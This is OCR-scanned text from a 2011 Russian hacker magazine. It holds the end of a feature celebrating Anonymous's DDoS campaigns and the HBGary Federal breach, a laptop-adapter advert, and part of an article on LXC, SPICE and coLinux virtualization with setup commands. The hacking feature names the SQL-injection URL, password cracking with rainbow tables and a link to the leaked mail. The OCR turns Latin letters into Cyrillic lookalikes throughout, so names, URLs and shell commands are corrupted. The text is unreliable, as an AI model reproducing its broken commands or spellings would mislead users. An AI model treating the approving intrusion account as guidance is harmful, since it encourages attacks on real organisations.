приводит к весьма печальным последстви- 
ям. 

Тогда анонимус преподал копирастам весьма 
наглядный урок (сайты лежали доволь- 
но долго) и вновь привлек к себе немало 
внимания, закрепив за собой репутацию 




Та самая маска V из «V — значит 
вендетта» 



своеобразной сетевой машины возмездия, 
безликой и беспощадной. 

ѴѴікіІеакз и НВбагу 

Все вышеупомянутое, как ни странно, можно 
назвать не более чем легкой разминкой 
перед действительно серьезными делами. 
Если смотреть на все эти операции в ретро- 
спективе, как мы сейчас и делаем, становит- 
ся очевидно, что с каждым разом анонимы 
действуют все слаженнее и жестче. Кстати, 
на счету Апопутоиз вообще-то куда больше 
деяний — в основном это случаи, не полу- 
чившие столь широкой огласки. Были среди 
них и «день порно на ѴоиТиЬе», и война с 
ТитЫг и много чего еще. Подробнее обо 
всех этих прецедентах ты можешь почитать 
хотя бы в той же «Википедии». 

Ну а следующей масштабной атакой в 
«послужном списке» анонимуса стала кампа- 
ния в защиту ѴѴікіІеакз и Джулиана Ассанжа. 
Как ты наверняка знаешь, гонения на 
«Викиликс» имели по-настоящему между- 
народный размах: против Ассанжа и его 



Оскверненный ТѵѵіМег Барра 
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Послание Апопутоиз н утекшая 
переписка сотрудников НВбагу 

детища тогда ополчились не только пра- 
вительства и спецслужбы, к делу также 
подключились банки и платежные системы 
(МопеуЬгоокегз, Ѵіза, МазІегСагсІ и РауРаІ), 
заблокировавшие счета проекта, на которые 
принимались добровольные пожертвования. 
В общем-то, тогда мало у кого возникали 
сомнения насчет того, имело ли все это 
политический оттенок. Однако анонимуса 
такие мелочи занимали мало, анонимуса 
больше занимала месть. 

Все это имело место в декабре 2010 года, и 
вот ведь забавная штука: с 8 по 10 декабря 
клиентскую версию программы І_ОІС ска- 
чали около 30 000 раз, учитывая, что общее 
количество окачиваний за все время ее 
существования составляло тогда примерно 
50 000. Что и говорить — атака вышла мас- 
штабной. 

Операция получила название РауЬаск 
(«расплата» — англ.), и основным оружием 
анонов опять стал 00о5. Все намеченные 
цели, среди которых оказались не только 
упомянутые платежные системы, но и сайты 
правительства Швеции и ѵѵеЬ-страницы 
американских политиков Джо Либермана и 
Сары Пэйлин, удалось положить без особых 
проблем. В даун ушел даже РауРаІ, который 
не так-то просто повалить. Однако пред- 
ставители компаний сообщили, что никаких 
особых проблем атаки им не доставили: 
бэкэнд не пострадал, с транзакциями все 
отлично, разве что они немного замедли- 
лись. Но помимо обычного ООоЗ’а анониму- 
сы не погнушались воспользоваться и дру- 
гими методами. «Враг адаптируется к нашей 
стратегии. Мы можем меняться быстрее», — 
сообщал один из ІРС-каналов. В ход пошел 
реальный ОйоВ: отправка факсов произ- 
вольного содержания через онлайновые 
бесплатные сервисы вроде МуРах.сот или 
Рах2его.сот . При отправке активистам реко- 
мендовали пользоваться многоступенчатым 
анонимайзером Тог или цепочками надеж- 
ных прокси-серверов. В послание можно 
включать символику Апопутоиз и случай- 
ные цитаты из документов на ѴѴікіІеакз. 



► 078 



ХАКЕР 06 /149/ 201 1 






СМИ, традиционно ничего толком не пони- 
мая, опять возопили об атаках хакеров, 
которые поддерживают Ассанжа. Репортажи 
выходили один забавнее другого, но, судя 
по всему, радовали самих анонов. К тому же 
многие пользователи, понимавшие в про- 
исходящем еще меньше средств массовой 
информации, стали опасаться совершать 
покупки, пока с платежными системами 
творится что-то невразумительное. Одним 
словом, цель вновь была достигнута. 

Но что-то мы все о банальном ООоЗ’е, да об 
акциях протеста... Журнал все-таки «Хакер» 
называется :]. Самым эпичным деянием ано- 
нов на сегодняшний день (в наших глазах) 
является жестокий урок, преподанный ими 
Аарону Барру. 

Господин Барр до недавнего времени являл- 
ся директором небольшой частной компании 
НВСагу Ресіегаі, которая специализирова- 
лась на информационной безопасности. 
Кому-то название компании может пока- 
заться знакомым, и это неспроста. Одним из 
соучредителей НВСагу является известный в 
ІТ’шных кругах ГрегХогланд: эксперт в обла- 
сти И Б, который успевает не только работать, 
но и писать книги, статьи, вести блоги и 
сайты, ездить по всевозможным конферен- 
циям с докладами и при всем при этом живо 
интересоваться онлайновыми играми и воз- 
можностью их взлома. НВСагу Ресіегаі была 
не чем иным, как дочерним предприятием 
компании Хогланда. 

Здесь стоит сделать небольшое отступле- 
ние и сказать, что вообще-то анонимусы 
далеко не всегда остаются безнаказанны. 

Сто в России пока не было прецедентов, 
чтобы кого-то судили из-за участия в 00о5- 



атаке, а в других странах дела обстоят 
немного иначе. После операции «Расплата» 
за Апопутоиз предметно взялись спец- 
службы многих стран. И начались аресты. 
Разумеется, ловить старались, да и старают- 
ся, не обычных школьников, которые ради 
лулзов скачали БОЮ и принимали участие в 
атаках, а управляющую верхушку «страшной 
хакерской группировки». Как мы признавали 
в самом начале статьи, координаторы атак 
и своего рода лидеры у анонов действи- 
тельно имеются, и именно они и оказались 
под прицелом у «органов». В основном 
аресты совершались по горячим следам — в 
декабре и январе, однако отголоски опе- 
рации «Расплата» слышатся и по сей день. 
Последнее сообщение об аресте очередного 
анонима попадалось мне на глаза всего пару 
дней назад, в 20-х числах апреля. Всего за 
прошедшие полгода спецслужбы и правоо- 
хранительные органы успели арестовать по 
подозрению в причастности к ОБоЗ-атакам 
на платежные системы не один десяток 
человек. 

«Какое же отношение все это имеет к Аарону 
Барру?», — спросишь ты. Отвечу: самое пря- 
мое. Дело в том, что Барр решил поиграть 
в шпиона, детектива и Джеймса Бонда в 
одном лице. Он планировал внедриться 
к анонимусам и, установив личности их 
лидеров, вывести их на чистую воду! Хотя 
розі І'асіит Барр и утверждал, что делал это 
исключительно в исследовательских целях, 
собирая информацию для анализа социаль- 
ных медиа, и совсем не собирался переда- 
вать собранные данные в руки ФБР, отчего- 
то в это верится с трудом. А если совсем 
честно, то это просто смешно. О каком 



«докладе на Р5А 201 1» может идти речь 
(наш герой якобы к нему готовился), когда 
ни для кого не секрет, что НВбагу давно 
и плотно сотрудничали с американскими 
военными, которые, по сути, и являлись 
крупнейшими клиентами компании. Ктому 
же примерно в это же самое время Барр и 
его партнеры точили зуб на военный тендер 
по созданию комплекса решений, позво- 
ляющих правительственным агентам вести 
жизнь в социальных сетях, скрываясь под 
десятками разных личностей. В общем, Барр 
явно решил «выслужиться», за что в итоге 
поплатился не только своей репутацией, но и 
репутацией всей компании. 

Крах Аарона Барра 

Поначалу все, видимо, шло неплохо. Барр 
под вымышленными именами (Ооосізреак, 
СодАпоп) стал зависать в ІРС-каналах 
анонимусов, где наблюдал и собирал 
информацию. Выделив для себя нескольких 
особенно подозрительных личностей, Барр 
постарался познакомиться с ними, войти в 
доверие, что-нибудь о них разузнать. Как 
ни странно, у него получалось. В ход пошло 
все — левые аккаунты в РасеЬоок и Тѵѵіііег, 
«черный пояс по боодіе», профессиональ- 
ные навыки. В какой-то момент Барру стало 
казаться, что его затея удалась, и он почти 
расколол хактивистов. Тогда он решил этим 
похвастаться... 

Аарон Барр умудрился дать интервью 
изданию Ріпапсіаі Тітез, в ходе которого 
заявил, что деанонимизировал целых 45 
человек из «группировки Апопутоиз», в 
том числе лидеров, которые управляют 
мощными ботнетами. Он самодовольно сооб- 
щал, что это люди из самых разных стран: 
Великобритании, Германии, Нидерландов, 
Италии и Австралии. Есть 30 самых активных 
и около 10 — координирующих действия 
группировки. Их лидера зовут Оуэн и он из 
Нью-Йорка, а сооснователь группировки 
якобы носит ник 0 и живет в Калифорнии. 

И вот тут-то под ногами Барра и разверзся 
форменный ад. 

Анонимусы довольно быстро обнаружили 
публикацию в Ріпапсіаі Тітез, и на сайте 
апоппеѵѵз.огд появился полный сарказма 
пост примерно следующего содержания: 
«Мистер Барр успешно пробился через 9000 
прокси-серверов в наше закрытое повстан- 
ческое ІРС-логово, где, прорвавшись через 
огненный лабиринт и собрав все золотые 
колечки по пути, открыл огромный серебря- 
ный сундуки нашел пароль легендарных 
хакеров Анонимусов. На данный момент 
можно с уверенностью предположить, что 
наши подземные сервера на Северном 
Полюсе тоже скомпрометированы». 

Несмотря на зубоскальство, в чатах анони- 
мов началась организация ответного удара 
по НВСагу, и Бар, увидев это, запаниковал. 
Он раскрылся анонимусам и даже попытал- 
ся поговорить с некоторыми из «лидеров», 
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Анонимусы протестуют против сайентологов в Лос-Анджелесе 



слезно уверяя их, что он простой иссле- 
дователь и не замышлял ничего дурного. 
Анонимус лишь равнодушно пожал плеча- 
ми. Остановить атаку уже было невозможно, 
как невозможно остановить сход лавины. 

В этот раз аноны не ограничились обыч- 
ным ББоЗ’ом и мелким хулиганством. 
Специалистам по безопасности Апопутоиз 
ответил должным образом, сыграв на их же 
поле. 

Первым под привычной ББо5-атакой слег 
сайт ЬЬдагѵіесІегаІ.сопп . Кстати, атаки на 
него продолжаются до сих пор, так что 
застать сайт работающим — трудно. На 
все мольбы о прекращении атак Барру 
довольно ехидно посоветовали закрыть 
на сайте дыры, раз уж он занимается 
ИБ. Дыры, в самом деле, были. Да еще 
какие... ЬЬдагу^ебегаЕсот не выстоял про- 
тив обычной 50І_-инъекци. А вот не надо 
было использовать СМ5 от сторонних раз- 
работчиков, к тому же не слишком хоро- 
шо написанную. Точная линка, с которой 
начался взлом: бЬдапТебегабсопл/радез. 
рЬр?раде1\Іаѵ=2&раде=27 . 

Добравшись до базы данных пользовате- 
лей, анонимусы пустили в ход радужные 
таблицы, а так как пароли в НВОагу хра- 
нились в МБ5 и были простыми, как три 
копейки, дело пошло бодро и хорошо. 
Быстрее всего удалось вскрыть пароли 
самого Аарона Барра и главного операци- 
онного директора Теда Вера. 

Дальше началось и вовсе что-то страшное, 
настоящий принцип домино. Начав с сайта 
бЬдапТебегабсопп . анонимусы последо- 
вательно взломали Тѵѵіиег, РасеЬоок и 
БіпкесІІп Барра, корпоративную сеть компа- 
нии, а также ЬЬдагѵ.сот и гооікіі.огд . при- 
надлежащие Хогланду. Затем заполучили на 
руки налоговую отчетность компании, нало- 
говые сертификаты, добрались до почты 
всех сотрудников, содержавшей более 60 
000 писем, и многого, многого другого. По 
непроверенным данным, в качестве завер- 
шающего штриха с іРаб Барра удаленно 
стерли все данные :). Каким образом все 



это было проделано, ты можешь прочесть 
на нашем сайте, в ][ была подробная статья 
на данную тему: \ллл/ѵѵ.хакер.ги/ро5І:/54902 . 
Замечу только, что во всем, как обычно, 
оказался виноват человеческий фактор. 
После взлома хактивисты еще и сплясали 
настоящую джигу на костях Барра. Они 
заявили, что все добытые им данные и 
«деанонимизация» лидеров — полная чушь. 
Цитата: «Мы видели все ваши внутренние 
документы. И знаете, что мы сделали? Мы 
посмеялись. Большая часть информации, 
которую вы «накопали», доступна всем и 
каждому в ІРС. Итак, почему же вы теперь 
не сможете продать эту инфу ФБР, как пла- 
нировали? Да потому что мы отдадим ее 
бесплатно!». 

Конечно, случившееся само по себе уже 
стало тяжелым ударом по репутации ком- 
пании, занимающейся информационной 
безопасностью. Грег Хогланд заговорил об 
ущербе в миллионы долларов, но это был не 
конец, это, в некотором роде, было только 
начало. В ворохе документации, попавшей 
в руки к анонимам, обнаружилось очень 
много интересного. Я приведу лишь пару 
примеров, остальное можешь изучить само- 
стоятельно, благо все «утекшее» свободно 
распространяется в торрентах. Например, 
вот ссылка на ТРВ: ІІперігаІеЬаѵ.огд/ 
Іоггепі/61 561 66/НВ6агѵ [еакеб етаіі . 

Итак, «грязного белья» у НВОагу оказалось 
много. Выяснилось, что Барр и компания 
совместно с фирмами, оказывающими 
охранные услуги в сфере ИБ (Раіапбг и 
Вегісо ТесЬпоІодіез), планировали дискре- 
дитировать ѴѴікіІеакз. Документ предлагает 
провести кампанию по дезинформации, 
включающую внедрение фальшивых доку- 
ментов в ѴѴікіБеакз, а затем — их разобла- 
чение, с целью очернить сайт. Также плани- 
ровались хакерские атаки на центральный 
сервер ѴѴікіБеакз в Швеции. Кроме того, 
были мысли добраться до людей, поставля- 
ющих информацию Ассанжу, и подвергнуть 
их «жесткому прессу». 

Еще, к примеру, стало известно, что НВОагу 



торговала двумя руткитами: Кеуіоддег и 12 
Мопкеуз. Цена первого составляла $60 000, 
второго — $240 000. Исходя из писем, можно 
также сделать вывод, что в закромах НВОагу 
имелся целый набор Обау-эксплойтов, кото- 
рыми фирма тоже приторговывала, либо 
держала про запас. Некоторые дырки пере- 
продавались по нескольку раз. 

В качестве послесловия 

Итогом этого жуткого акта возмездия стал 
уход Аарона Барра со своего поста в НВОагу 
Ребегаі, «чтобы позволить компании преодо- 
леть проблемы и идти дальше после этой 
ошеломляющей информационной бреши». 
Впрочем, после всего случившегося ново- 
явленного «Шерлока Холмса от ІТ» явно 
просто «ушли» с поста, чему он не особенно 
сопротивлялся. Кстати, с начала атаки успе- 
ло пройти всего три недели — Барр уво- 
лился уже в начале марта. «Мне необходимо 
сфокусироваться на заботе о моей семье 
и на восстановлении своей репутации», — 
признался он в одном интервью. 

Каким образом теперь будет восстанавли- 
вать свою репутацию НВОагу, ранее работав- 
шая с МсАІюе, военными и АНБ, — вопрос 
открытый. Что-то подсказывает нам, что 
ответ будет звучать неутешительно: никак. 
Апопутоиз, в свою очередь, очень радо- 
вались такой богатой добыче и широкому 
резонансу. На радостях они даже открыли 
собственный аналог «Викиликс»: ѵѵѵѵѵѵ. 
ФсеЬоок.сот/апопІеакз . Так сказать, на 
будущее. Какой-то особенно толстый тролль 
под шумок вообще умудрился дать интервью 
журналу РогЬез, представившись 16-летней 
девочкой Кайлой, которая якобы прини- 
мала непосредственное участие в атаке на 
НВОагу. «Кайла» очень язвительно сокру- 
шалась о том, что власти до сих пор не могут 
поймать ее, но вместе с тем выражала и 
некоторую обеспокоенность, сообщая, что 
удаляет все е-таіГы, а компьютер запускает 
при помощи тісгоЗБ-карты. 

Сейчас шумиха вокруг НВОагу уже немного 
стихла, и внимание анонимуса переклю- 
чилось на компанию 5опу, которая имела 
наглость ущемлять сетевые свободы людей, 
запрещала взламывать свои консоли и 
даже попыталась засудить джейлбрейкеров. 
Свою причастность к атакам на РІауЗіабоп 
Ыеіѵѵогк анонимы сначала отрицали, но 
затем то ли поддержали начатое кем-то дру- 
гим, то ли это с самого начала были они... 
Пока решительно непонятно, что происходит, 
но велик шанс, что данные о банковских 
картах юзеров Р5Ы уплыли в неизвестном 
направлении. А ведь сервисом пользуются 
более 70 000 000 человек! 

Подводя итог, заметим, что в интернете всег- 
да найдется новая мишень для анонимуса, 
новая цель и даже новые средства для ее 
достижения. Анонимус безлик, неискореним 
и, похоже, он только набирает силу. И он 
действительно не прощает, □с 
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реклама 




Р$Р N6 090 



Р8Р - заряжает мобильность и качество 




Компания Р8Р 
приготовила Вам подарок 
к отпуску — новый сетевой 
адаптер для ноутбука 
Р5Р Л/б 090! 
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Официальные дистрибьюторы Г$Р в России: 



Коосісо ОС5 



ТЕСНІЧ0ШСІЕ5 0І5ТРІВІІТІ0Ы 

\ллллллкоосІоо.ги \л/\л/\л/.осз.ги 




+7 (495) 221-1111 
\л/\ллл/.оІсІі.ги 



Высокая производительность, надежность, 
практичность, мобильность, безопасность 
и, конечно же, элегантность сделают 
наш адаптер Вашим постоянным спутником. 
Возьмите адаптер Р5Р ЫВ 090 с собой в дорогу 
вместо громоздкого и тяжелого оригинального 
сетевого адаптера. Ваше путешествие, работа 
и отдых станут еще более комфортными! 

ѵѵѵѵѵѵ.^зр-роѵѵег.ги 







ІШІХОЮ 



■ ■ Евгений Зобнин ІехесЬіЬги) 



Как СоЫпих управляет памятью 



биезі 

Ыпих 



Іпіегтесііаіе 

ОхРРРРРРРР 
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ГРАНИ 
ВИРТУАЛЬНЫХ 
МИРОВ 
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Разбираемся с новыми и необычными 
технологиями виртуализации 

• Виртуализация... В последнее время это слово обрело просто магиче- 
ские свойства. О виртуализации говорят везде, где не запрещают, и 
все, кто только может. Однако чего-то по-настоящему нового и инте- 
ресного не говорит почти никто. Я восполню этот пробел и расскажу о 
трех новых самых интересных и полезных технологиях виртуализации. 

нужна стандартная реализация, легко и повсеместно доступная. В 
таких ОС как РгееВЗй и Эоіагіз стандартная реализация системы 
виртуализации уровня ОС есть прямо из коробки: это механизмы 
РгееВБО ^іі и Боіагіз 2опез. Виртуализация уровня машины также 
доступна почти из коробки, с помощью установки пакета цети во 
РгееВБО или ѴігІиаІВох в Боіагіз (хотя сюда тоже можно поставить 



Пингвин в контейнере 

Всего за несколько лет виртуализация из средства для ознаком- 
ления с новыми ОС и отладки системных приложений преврати- 
лась в один из самых важных элементов в индустрии ІТ. Сегодня 
без нее не обходится ни один серьезный сервер, хостинг и даже 
десктоп. Это настоящий стандарт, но, как любому стандарту, ему 
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Перманентная настройка 
системы для ЬХС 



Чтобы не повторять описанные в разделе І_ХС 
подготовительные шаги после каждой перезагрузки 
машины, стоит научить пингвина выполнять их. Для 
этого следует добавить следующую строку в /еІсЛзІаб: 

с§гоир /ѵаг/с§гоир с§гоир сіе-раиіііз 0 0 

И следующую запись в файл /еіс/пеіѵѵогк/іпіегіасез (для 
ОеЬіап/ІІЬипШ-совместимых ОС): 

аиііо Ьг0 

і-Расе Ьг0 іпеі: ббср 
Ьгіб§е_рог1:5 е1:И0 
Ьгіб§е_-Рб 0 



цепли). В Ыпих все несколько иначе. Честную виртуа- 
лизацию тут принято делать с помощью цети-кѵт, ко- 
торый опирается на ядерный драйвер КѴМ, доступный 
практически в любом дистрибутиве, а виртуализацию 
уровня ОС — с помощью сторонних разработок, таких 
как Ыпих-ѴЭегѵег или ОрепѴХ. Это отличные системы, 
но у них есть серьезный изъян: для своей работы они 
требуют патчинга ядра, а это не нравится ни пользо- 
вателям, привыкшим к простоте современных І_іпих- 
дистрибутивов, ни админам, для которых пересборка 
ядра на сервере сродни игре в русскую рулетку (никогда 
не знаешь, как это повлияет на стабильность системы). 
Именно поэтому появился проект І_ХС, позволяющий 
получить полноценную виртуализацию уровня ОС на 
обычном ванильном ядре. І_ХС (ЫпиХ Сопіаіпегз) очень 
похож на Ыпих-ѴЭегѵег и ОрепѴХ, за тем лишь исключе- 




Консоль Соііпих сразу после запуска 



нием, что вместо сторонних механизмов, внедряемых 
в ядро с помощью патчей, он использует механизмы 
«пространства имен» (патезрасез) и «группировки 
процессов» (сдгоирз), доступные в любом современном 
Ыпих-ядре. Технология Ыпих патезрасез позволяет 
размещать выбранное подмножество процессов в 
изолированном окружении чего-либо. Это можетбыть 
файловое пространство имен, содержащее дерево 
файлов, видное только этим процессам (аналог сЬгооО, 
пространство имен процессов, ІРС и та к далее. Процес- 
сы, помещенные в обособленные пространства имен, 
будут «думать», что находятся на другой машине и не 
смогут взаимодействовать с остальными процессами 
и файловой системой. В дополнение к пространствам 
имен в ядре также доступен механизм группировки 
процессов под названием сдгоирз, который позволяет 
объединить несколько процессов в одну группу и приме- 
нить к ней особые установки ядра (изменить приоритет, 
назначить ограничения ресурсов, поместить в обосо- 
бленное пространство имени так далее). Помещенный 
в группу процесс уже никогда не сможет самостоятельно 
ее покинуть, поэтому сдгоирз оказывается мощнейшим 
механизмом ограничений процессов в ресурсах (для 
которого, кстати, есть удобный инструментуправления, 




> СІѴСІ 

Виртуальная машина 
цепли с поддержкой 
протокола 5РІСЕ 
уже стала частью 
дистрибутивов 
Ребога 14 и РНЕІ_6, 
а также ключевым 
компонентом про- 
дукта под названием 
Веб На! Епіегргізе 
ѴігІиаІЫабоп Іог 
Оезкіорз. 
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• Официальный сайт 
протокола 5РІСЕ: 
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• ЕХС: Іхс.зЕпеЦ 

• СоЫпих: соііпих. 
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• АпбЫпих: апбііпих. 
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Приложения СоНпих отличаются от родных \Л/іпсІоѵѵ$- 
приложений только внешним видом 



распространяемый в пакете ІіЬсдгоирз). Работая вместе, эти техно- 
логии реализуюточень мощную и гибкую систему виртуализации, 
возможности которой использует І_ХС, выступая в роли простой и 
удобной в использовании обертки к паппезрасез и сдгоирз. И это не 
просто слова. Пользоваться І_ХС действительно просто и приятно. 
Например, чтобы создать виртуальный сервер в свежеустановлен- 
ном ЕІЬипІи, достаточно выполнить всего шесть следующих шагов 
(причем первые четыре шага — это просто подготовка системы к 
І_ХС, которую нужно выполнить всего один раз): 

1. Установить І_ХС и утилиты управления сетевым мостом: 

$ біісіо ар1:-§е1: Іпз1:а11 Іхс Ьгіб§е-и1:іІ5 

2. Запустить чекер конфигурации ядра, который проверит, всели не- 
обходимые І_ХС опции включены (кслову сказать, І_ХС может работать, 
даже если некоторые из них ядром не поддерживаются): 

$ біісіо 1хс-сІіесксоп^§ 

3. Создать каталог для файловой системы сдгоирз и смонтировать ее: 

$ зисіо тксііг /ѵаг/с§гоир 
$ вибо тоипі: -1: с§гоир с§гоир /ѵап/с§поир 

4. Создать интерфейс моста, который будет использован для сетевой 
коммуникации между виртуальными окружениями (по-хорошему его 
придется еще и настроить): 

$ зисіо Ьгс1:1 асІсІЬг Ьг0 

5. Создать виртуальное окружение с ЕІЬипІи (или другим дистрибути- 
вом) внутри (І_ХС поставляется с набором "шаблонов", расположенных 
в каталоге/изг/ІіЬ/ІхсАетрІаІез, каждый из них представляет собой 
скрипт, выполняющий скачивание, установку и конфигурирование 
виртуального окружения): 

$ зисіо ар*-§е1: Іпз1:а11 беЬоо1:5І:гар 
$ зисіо 1хс-сгеа1:е -п иЬипѣи -1: иЬигтЬи \ 

--Р /изг/збаге/сІос/1хс/ехатр1е5/1хс-ѵе1:Іі. согтР 

Здесь '-С указывает на имя шаблона внутри, а '-Г — на файл началь- 
ных настроек. 

6 . Запустить окружение и проверить его работоспособность: 

$ зисіо 1хс-з1:аг1: -сі -п иЬипѣи 
$ зисіо Іхс-ігѵРо -п иЬиггЬи 

Далее можно зайти в окружение с помощью команды «зисіо Іхс- 
сопзоіе -п ибипіи». На экран вывалится стандартный консольный 



дейу с просьбой ввести логин и пароль (по дефолту это гооЕгооі). 
Какие-либо настройки и модификации можно внести в окружение с 
помощью редактирования его корневой системы, расположенной в 
каталоге /ѵаг/ІіЬ/Іхс/имя/гооД'з, и конфигурационного файла /ѵаг/ІіЬ/ 
Іхс/имя/сопбд. В целом, І_ХС — это простой, последовательный и гиб- 
кий инструмент, с помощью которого можно создавать самые разноо- 
бразные конфигурации (подстраивая разделение пространств имен и 
настройки сдгоирз под ситуацию), но у него есть один существенный 
недостаток — невозможностьуказать лимит на процессорное время. 

Виртуальные специи 

Не за горами тот день, когда любая домашняя машина превратится 
в тонкий клиент, созданный лишь для того, чтобы подключиться к 
интернету и дать пользователю доступ к приложениям в облаке. В 
будущем почти все наши программы будут исполняться на удаленных 
серверах, а домашние компы превратятся в маленькие коробочки, 
практически бесполезные без подключения к интернету. 

Но чтобы будущее сбылось, нужны соответствующие наработки. 
Сегодня надежды принято возлагать на ѵѵеЬ-технологии, которые уже 
используются многими интернет-компаниями для переноса вычис- 
лений в облака: почтовый клиент дтаіі, гзз-читалка доодіе геабег, 
доодіе босз и огромное количество других продуктов поколения ѵѵеЬ 
2.0. Со временем их будет становиться все больше, а локальных при- 
ложений — все меньше. Проблема только в том, что ѵѵеЬ-технологии, 
сколь далеко бы они ни продвинулись, никогда не смогутсравниться с 
нэйтивными аналогами в скорости работы. 

Поэтому в Сети нет и не будет полноценных РЬоІозЬор’ов, 30 Мах’ов 
или, например, игры Сгузіз. 

С другой стороны, подобного добра полно для ѴѴіпбоѵѵз и Ьіпих, и его 
даже можно использовать удаленно, если подключиться к машине 
с помощью программы просмотра удаленного рабочего стола. Но и 
здесь есть засада: ни один из Ретоіе йезкіор протоколов никогда 
не был рассчитан на работу с ОС. Это инструменты администрирова- 
ния, поэтому запустив на удаленной стороне РЬоІозЬор или 30 Мах, 
пользователь не получит ничего, крометормозов, ужасной картинки 
и жутких счетов за интернет. Здесь нужен сетевой протокол, который 
бы изначально был рассчитан на полноценную работу с операцион- 
ной системой. 

Технология БРІСЕ (Зітріе Ргоіосоііог Іпберепбепі Сотриііпд 
Епѵігоптепі — простой протокол для независимых вычислительных 
окружений), открытая Реб На! в 2009 году, как раз и является таким 
протоколом. 

Основная идея 5РІСЕ заключается втом, что эффективный протокол 
доступа кудаленному рабочему столу должен быть чем-то большим, 
чем просто механизмом передачи текущей картинки к клиенту, а из- 
менений состояния устройств ввода — ксерверу. Поэтому клиентские 
и серверные реализации 5РІСЕ — это не просто два связанных ком- 
понента, а целая инфраструктура, построенная из многих кирпичи- 
ков. 

Первый компонент этой инфраструктуры — виртуальная машина, 
внутри которой должна работать операционная система и ее графи- 
ческий интерфейс (который будет передан ЗРІСЕ-сервером клиенту). 
Второй компонент — псевдоустройство ОХЕ, выполняющее роль 
видеоадаптера внутри виртуальной машины. 

Работая в виртуальной машине, ОС выполняет все операции вывода 
графики через это ОХЕ-устройство (оно может прикидываться обыч- 
ной Ѵ6А-картой), транслирующее операции ЗРІСЕ-серверу, который 
передает их клиенту. Основной профит всего этого втом, что работая 
на самом низком уровне, ОХЕ получает возможность всячески 
оптимизировать графические операции, чтобы, во-первых, по сети 
было передано как можно меньше информации, а во-вторых, чтобы 
не загружать сервер дополнительными вычислениями. В частности, 
ОХЕ-драйвер может производить такие оптимизации как передача 
графических команд вместо целыхучастков буфера — например, 
команда «размыть прямоугольник» вместо отсылки буфера, содер- 
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Команда Іхс-сНесксопЛд показала, что ОС готова к ІХС 

жащего уже размытую область экрана (но для большинства таких 
операций нужна установка ОХЕ-драйвера в ОС); сжатие изображения 
с помощью алгоритмов, специально разработанных для этой цели 
(Оиіс, Еетеі-Хіѵ, ОІоЬаІ Е2), выбирая наиболее подходящий алгоритм 
эвристическим путем; сжатие видеопотоков с помощью М^РЕѲ и 
другие. 

Третий компонентБРІСЕ — это сервер, встроенный прямо в виртуаль- 
ную машину. Его задача — поддерживать связь с клиентом и пере- 
давать данные отустройств ввода клиента к серверу, а результаты 
работы устройства 0Х1_ и аудиоустройства — клиенту. При этом пере- 
дача осуществляется через несколько независимых каналов, каждый 
из которых отвечаетза свой тип данных. Видеоканал используется 
для передачи команд и данных от 0Х1_-устройства, канал входных 
данных — для событий от клавиатуры и мыши клиента. Курсорный 
канал — для передачи данных о положении курсора и так далее. 
Количество каналов не ограничено и возможно будетувеличено в 
будущих версиях протокола. 

Четвертый компонентБРІСЕ — клиентская программа, которая 
занимается отправкой состояния устройств ввода на сервер и фор- 
мированием изображения из принятых команд устройства ОХЕ. Все 
полученные графические объекты клиентаккуратно кэширует, такчто 
если в будущем над одним из них произойдет какое-то действие, его 
не придется загружать с сервера повторно. 

В совокупности все это делает БРІСЕ очень гибким и эффективным 
протоколом. Если, например, пользователь просто подвигал мышь, 
то все, что будет передано по сети, это изменившиеся координаты 
курсора. При этом сама отрисовка движений мыши будет произведе- 
на на стороне клиента, без задействования мощностей сервера. Это 
возможно благодаря ОХЕ, который еще перед отправкой изображе- 
ния определил курсор какотдельный графический буфер и пере- 
дал клиенту, который закешировал его на своей стороне. Операция 
перетаскивания окнатакже будет очень эффективна: клиенту пере- 
дастся всего лишь одна команда изменения координатокна (точнее, 
графического буфера втерминах ОХЕ). 

БРІСЕ-серверы обладают интеллектом и умеют адаптироваться под 
изменяющуюся ситуацию. Например, если один из серверов БРІСЕ 
окажется слишком загружен, клиент будет прозрачно перенесен 
на другой сервер. Тоже относится и к возможностям клиентской 
стороны. Если, например, клиент отличается низкой производи- 
тельностью, но широким каналом (например, планшет, работающий 
в ѴѴі МАХ- сети), то БРІСЕ автоматически перенастроит ОХЕ-драй вер 
таким образом, чтобы тот отдавал клиенту уже готовую и обработан- 
ную картинку (графический буфер вместо команды по его отрисовке, 
несжатое видео и так далее). Это разгрузит клиентскую сторону. Но 
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Редактируем конфиг виртуального окружения ЬХС 

самое замечательное в БРІСЕ то, что его поддержка уже внедрена в 
виртуальную машину цеппи, такчто для настройки сервера и клиента 
не придется делать ничего, кроме ввода нескольких простых команд: 

1. На стороне сервера следует за пустить цепни с аргументом '-зрісе' : 

$ цети-кѵт -врісе рог1:=1234, сІІ5аЫе-1:іске1:іп§ \ 

- Еісіа /путь/образа/диска 

2. На стороне клиента запустить5РІСЕ-клиент(он распространяется 
в пакете зрісе-сііепі;), указав адрес и порт сервера: 

$ врісес -б ІосаІІіоБІ: -р 1234 

Соединение можно зашифровать и защитить паролем, убрав опцию 
, бІ5аЫе-^іскеЕпд , и указав вместо нее , ра55\л/огб=пароль'. 

Кооперативный Ипих 

Можнодолго споритьотом, что лучше, ѴѴіпбоѵѵз или Бі п их, а можно 
просто начать использоватьобе операционные системы вместе. В 
современном мире сделать это не составляеттруда — достаточно об- 
завестись машиной с более-менее современным процессором, под- 
держивающим аппаратную виртуализацию, установить виртуальную 
машину и поставить внутрь нужную ОС. Вуаля, на компе появилась 
новая ОС, доступная через щелчок мышкой по нужной иконке. 

Это отличный способ ознакомиться с новой ОС или держать под рукой 
инструмент, потребность в котором возникает нечасто. Однако как 
бы ни были удобны современные виртуалки, они слишком громоздки 
и навязчивы. Если, например, ты держишь виртуальную машину с 
ѴѴіпсІоѵѵзтолько для того, чтобы запускать на ней МБ ОЕЕісе, это оказы- 
вается далеко не самым изящным и удобным решением. Гораздо про- 
ще воспользоваться возможностями «не эмулятора» ѴѴі пе, который 
позволитзапустить нужную программу без использования каких-то 
дополнительных оберток и мишуры в виде полноценного рабочего 
стола ѴѴіпбоѵѵз и всех его сервисов. 

По многим параметрам ѴѴі пе превосходитобычные средства вир- 
туализации, и, наверное, есть желающие увидеть нечто подобное 
для ѴѴіпбоѵѵз. Соорегабѵе І_іпих (сокращенно СоБіпих) разработана 
специально для них. Однако это далеко не ѴѴі пе и даже не обычная 
виртуальная машина. 

В отличие отѴѴіпе, который является простой программой, реали- 
зующей набор системных функций ѴѴі п32 поверх Бі п их и виртуальных 
машин, воссоздающих весь комп в виде программы, система СоБіпих 
остается всетем же ядром Бі п их, работающим на настоящем железе 
(стем исключением, что существует оно скорее в качестве паразита, 
нежели полноценной операционной системы). 

Ядро СоБіпих получаетсвое место под солнцем, прикидываясьобыч- 
